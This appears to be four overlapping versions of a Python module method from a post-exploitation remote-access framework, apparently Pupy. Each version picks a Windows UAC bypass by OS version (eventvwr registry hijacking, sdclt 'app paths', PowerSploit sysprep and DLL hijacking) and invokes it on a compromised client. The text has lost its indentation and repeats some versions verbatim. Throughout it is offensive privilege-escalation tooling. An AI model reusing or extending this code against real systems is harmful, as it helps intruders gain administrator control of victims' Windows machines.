def run(self, args):
if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
self.error("You are using a x86 process while the os architecture is x64")
self.error("Migrate to a x64 process before trying to bypass UAC")
elif args.method == "eventvwr" or (self.client.desc['release'] == '10' and args.method == None):
self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
bypassUasModule.bypassuac_through_EventVwrBypass()
else:
self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
def run(self, args):
if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
self.error("You are using a x86 process while the os architecture is x64")
self.error("Migrate to a x64 process before trying to bypass UAC")
elif args.method == "eventvwr" or (self.client.desc['release'] == '10' and args.method == None):
self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
bypassUasModule.bypassuac_through_EventVwrBypass()
else:
self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
def run(self, args):
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
dll_hijacking = False
registry_hijacking = False
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
registry_hijacking = True
else:
dll_hijacking = True
elif args.method == "eventvwr":
registry_hijacking = True
else:
dll_hijacking = True
if registry_hijacking:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_EventVwrBypass()
elif dll_hijacking:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
def run(self, args):
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
appPathsMethod = False
eventvwrMethod = False
dllhijackingMethod = False
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
appPathsMethod = True
else:
dllhijackingMethod = True
elif args.method == "appPaths":
appPathsMethod = True
elif args.method == "eventvwr":
eventvwrMethod = True
elif args.method == "dll_hijacking":
dllhijackingMethod = True
if appPathsMethod:
self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
bypassUasModule.bypassuac_through_appPaths()
if eventvwrMethod:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_eventVwrBypass()
if dllhijackingMethod:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_powerSploitBypassUAC()